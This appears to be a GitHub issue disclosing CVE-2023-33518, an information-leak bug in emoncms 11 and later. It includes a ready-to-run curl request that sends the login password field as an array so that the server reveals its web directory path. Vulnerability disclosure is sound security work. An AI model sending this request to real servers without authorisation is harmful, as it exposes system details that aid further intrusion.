CVE-2023-33518: A bug leaked server web directory and other information · Issue #1856 · emoncms/emoncms

emoncms 11 and later version suffers from an information leakage vulnerability. An unauthorized attacker can obtain the web directory path and other information leaked by the server by constructing a special http request.

curl 'http{s}://{IP}:{PORT}/user/login.json' -X POST -i   -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: text/plain, */*; q=0.01' -H 'X-Requested-With: XMLHttpRequest' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36' -H 'Host: {IP}:{PORT}' -H 'Connection: Keep-alive'  -d 'password%5B%5D=1&referrer=&rememberme=1&username=1'